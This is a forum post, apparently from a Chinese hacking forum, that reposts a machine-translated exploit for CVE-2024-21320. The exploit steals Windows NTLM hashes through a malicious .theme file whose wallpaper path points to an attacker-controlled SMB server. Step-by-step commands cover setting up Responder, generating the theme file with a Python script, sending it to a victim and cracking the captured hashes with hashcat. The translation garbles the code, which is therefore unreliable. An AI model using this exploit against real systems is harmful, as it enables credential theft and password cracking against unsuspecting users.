H

Microsoft Windows -NTLM哈希泄漏恶意窗户主题

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
#利用标题: CVE-2024-21320-NTLM哈希通过恶意窗户主题泄漏
#日期: 02/03/2025
#利用作者: abinesh kamal k u
#CVE : CVE-2024-21320
#Ref: https://www.cve.org/cverecord?id=cve-2024-21320
##步骤1:安装响应者
响应者是捕获SMB上NTLM哈希的工具。
git克隆https://github.com/lgandx/responder.git
CD响应者
用网络接口替换eth0
##步骤2:创建一个恶意的Windows主题文件
### Python脚本生成恶意theme文件
导入操作系统
#攻击者控制的SMB服务器IP
Attacker_smb_server='192.168.1.100'#将其更改为攻击者的IP
#恶意主题文件的名称
theme_filename='MALICIT.THEME'
#恶意.theme文件内容
theme_content=f'''
[主题]
DisplayName=安全更新主题
[控制面板\桌面]
wallpaper=\\\\\ {adtacter_smb_server} \\ share \\ malicious.jpg
[VisualStyles]
路径=%SystemRoot%\\ Resources \\主题\\ Aero \\ aero.msstyles
colorStyle=正常颜色
尺寸=正常化
'''
#写主题文件
以打开(theme_fileName,'w')为them_file:
theme_file.write(theme_content)
print(f'[+]恶意主题文件'{theme_filename}'创建。')
#可选:启动Python HTTP服务器以服务恶意主题文件
start_http=input('start http服务器要交付主题文件?(y/n):
').strip()。lower()
如果start_http=='y':
打印('[+]在端口8080上启动HTTP服务器.')
OS.System('Python3 -M http.server 8080')
````````
##步骤3:交付捕获NTLM哈希
1。将“恶意。”文件发送到目标。
2。捕获NTLM HASH:的Run Responder
sudo python3 responder.py -i eth0
3。等待受害者打开“ .theme”文件。
4。从响应者日志中提取NTLM哈希,并使用HashCAT:对其进行破解
hashcat -m 5600 capture_hashes.txt rockyou.txt
- -
abinesh kamal k u
abineshjerry.info
MTECH-网络安全系统网络
阿姆里塔大学
 
后退
顶部